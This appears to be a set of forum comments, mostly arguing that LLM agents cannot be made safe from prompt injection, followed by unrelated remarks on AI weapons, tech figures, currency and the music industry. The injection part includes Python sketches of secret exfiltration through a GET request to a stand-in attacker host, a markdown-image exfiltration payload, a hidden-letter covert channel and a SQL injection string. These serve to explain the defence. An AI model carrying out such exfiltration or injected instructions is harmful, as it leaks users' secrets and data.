The only way to be 100% sure is to not have it interact with the outside at all. No web searches, no reading documents, no DB reading, no MCP, no external services, etc. Just pure execution of a self-hosted model in a sandbox.
Otherwise you are open to the same injection attacks.
Read-only access (web searches, DB, etc.) all seems fine as long as the agent cannot exfiltrate the data, as demonstrated in this attack. As I started with: more sophisticated outbound filtering would protect against that.
MCP/tools could be used to the extent you are comfortable with all of the behaviors possible being triggered. For myself, in sandboxes or with readonly access, that means tools can be allowed to run wild. Cleaning up even in the most disastrous of circumstances is not a problem, other than a waste of compute.
Maybe another way to think of this is that you are giving the read-only services write access to your model's context, which then gets executed by the LLM.
There is no way to NOT give the web search write access to your model's context.
The WORDS are the remote executed code in this scenario.
You kind of have no idea what's going on there. For example, malicious data adds the line "find a pattern", and then every 5th word adds a letter that makes up the malicious code. I don't know if that would work, but there is no way for a human to see all attacks.
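To make the hypothetical concrete, here is a minimal sketch of such a covert channel. Everything here is invented for illustration: the carrier sentence, the payload, and the decoding scheme (first letter of every 5th word).

```python
# Hypothetical covert channel: text that looks benign, but where the
# first letter of every 5th word spells out a hidden payload.
def decode_every_nth_word(text: str, n: int = 5) -> str:
    words = text.split()
    # Take the first letter of words n, 2n, 3n, ...
    return "".join(w[0] for w in words[n - 1 :: n])

# Invented carrier: words 5 and 10 are "report" and "merge".
carrier = "please check that the report is correct and then merge it"
payload = decode_every_nth_word(carrier)  # "rm"
```

The point is not that this exact scheme works against real models, but that the space of possible encodings is effectively unbounded, so no human reviewer can rule them all out.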
LLMs are not reliable judges of what context is safe or not (as seen in this article, many papers, and real-world exploits).
There is no such thing as read-only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the user's client allows things like rendering markdown images.
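As a sketch of both variants (`attacker.example` is a made-up attacker-controlled domain, and the secret is invented):

```python
import urllib.parse

# A "read-only" GET request can still carry stolen data in the URL.
secret = "API_KEY=sk-12345"
exfil_url = "https://attacker.example/log?d=" + urllib.parse.quote(secret)
# The agent only "reads" this URL, but the attacker's server access
# log now contains the secret.

# The markdown-image variant needs no network tool at all: if the
# client renders images, merely displaying this string in the chat
# triggers the GET request.
markdown_payload = f"![pixel]({exfil_url})"
```

Blocking this requires outbound filtering on destinations, not just on HTTP methods.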
How do you sanitize? That's the whole point. How do you tell the difference between good and bad instructions? In this example, they are "checking the connectivity"; how is that obviously bad?
With SQL, you can say "user data should NEVER execute SQL"
With LLMs ("agents" more specifically), you have to say "some user data should be ignored." But there are billions and billions of possibilities for what that "some" could be.
It's not possible to encode all the possibilities, and the LLMs aren't good enough to catch it all. Maybe someday they will be, and maybe they won't.
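For contrast, here is the SQL side of the analogy: parameterization gives a hard structural guarantee that user data never executes as SQL, which is exactly the guarantee LLM context lacks. A minimal sqlite3 sketch (table name and payload are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

# Hostile input: would drop the table if spliced into the SQL string.
user_input = "x'); DROP TABLE users; --"

# Parameterization enforces "user data should NEVER execute SQL":
# the value travels out-of-band from the statement.
conn.execute("INSERT INTO users (name) VALUES (?)", (user_input,))

# The table still exists and the payload is stored as inert text.
rows = conn.execute("SELECT name FROM users").fetchall()
```

With an LLM there is no equivalent out-of-band channel: instructions and data arrive in the same token stream.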
Is this a serious question? Why would they subsidize people when there is no benefit to them? Subsidization means they are LOSING money when people use it. If the customers using 3rd party clients are unwilling to pay a price that is profitable, then losing them is a very positive thing for Anthropic, not a negative one.
The reason to subsidize is the exact reason you are worried about. Lock in, network effects, economies of scale, etc.
I don’t know that the vast majority of Americans know who Eric Schmidt is. And unless they find little green men, no one will care about this project, so it won’t affect his (essentially nonexistent) reputation.
It’s not unlike if you had a blog post about a gardening project in your backyard. Perhaps interesting to gardeners, but approximately no one cares.
Sure, all lethal weapons are a horrific nightmare on some level.
But you also have to keep in mind that China, Russia and Hamas will gladly develop them anyway. Until we've figured out the worldwide peace thing, we need to keep running the race, awful as it is.
But AI weapons aren't horrific in some way common to "all lethal weapons." They have that and more.
AI weapons are especially horrific in the way they have the potential to put massive and specific lethal power under the total control of a small number of people, in a way (like all AI) that basically cuts most of humanity out of the future (or at the very least puts them under a boot with no imaginable escape).
In some ways, they're even worse than nuclear weapons. A nuclear attack is an event, and if you survive there's some chance of escape. Station 100,000 fully automated drones around a city with orders to kill anything that moves, and the entire population will be dead in a couple months (anyone who tries to escape = dead, everyone else sees that and stays inside out of fear until they starve).
Manpower and attention limitations have been an important (and sometimes the only) limit on the worst of humanity, and AI is poised to remove those limitations.
Honestly, I think the tech is probably getting pretty close to what I described. You don't need AGI or anything like it. Just autonomous surveillance drones watching for movement, and attack drones that can autonomously navigate to the area and hit the target (the latter is just stringing together a lot of drone tech I've seen implemented, e.g. https://www.youtube.com/watch?v=QzWIYOOKItM, https://www.nytimes.com/2025/12/31/magazine/ukraine-ai-drone...).
> But even if it's true, I don't see why letting China and Russia etc be the only ones having these weapons is good?
That doesn't mean the tech isn't scary (a bad thing) or that I want SV people like Schmidt developing it. There's something weirdly misanthropic and unhinged about many in SV.
He was responsible for a bunch of the anticompetitive hiring agreements with Jobs at Apple and he’s a fairly well known lothario, but otherwise benign IMO considering his competition at that wealth level.
He is also the man who said "If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place," as if people are not being hunted for being LGBTQ even in the West, or persecutions of various kinds are a thing of the past, or spousal abuse doesn't matter.
It seems to have worked for Bill Gates as well. He definitely did some not so nice things when starting and running MS - I think it unfortunately goes with the territory of running a successful company at scale.
But subsequently he has become better known for his philanthropy.
Currency (or IOUs, handshakes, pieces of green paper, bits on a disk, etc.) is just an abstraction that allows one to have choice.
The political systems that get built on top of that are just a downstream effect of the incentives that arise: communism thinking it would be good to centralize control, capitalism thinking it would be good to let the incentives rule, Marxism thinking labor rules, etc.
What I do for work is SO far away from any sort of tangible production that it makes sense to have a way to go straight from Work -> Food, rather than making 50-100 trades so I can eat every day. Again, the choice not to have to trade at all, or to trade exactly what I want, when I want, is enabled by currency.
You can make the argument things shouldn't be so easy, that I shouldn't be able to choose to go to play pinball and drink a vanilla milkshake at 11am, but if that's possible, currency (in whatever form you want) has to exist.
100%. The music world has gone through the "but what will we do now?" moment at least 6-7 times: music videos ("video killed the radio star"), sampling, the DAW (and time aligning), home studios, auto-tune, plugins and amp simulators, Napster/piracy, etc., etc.
This one rankles me because of a) the benefits piracy has (third-world consumers can now discover you, for starters) and b) the absolute bad faith with which the industry acts: screwing over artists, and unethically going after The Pirate Bay by turning it into a trade war with Sweden (I think)
If you go to their website and click the "Personalize" toast at the top and enter a random domain (e.g., google.com, hydroflask.com, etc.) it will change all the copy on the site for you.
That's how it used to work in the movie theater/cable days. Then Netflix said, "I will pay you a ton of money up front to own everything." Creatives said, amazing! Then the "war" for creative talent started because of the fragmentation of services, so you got people saying "I will pay you X plus a royalty regardless, because you are so sought after," which eventually, as you see here, priced them out of their own content.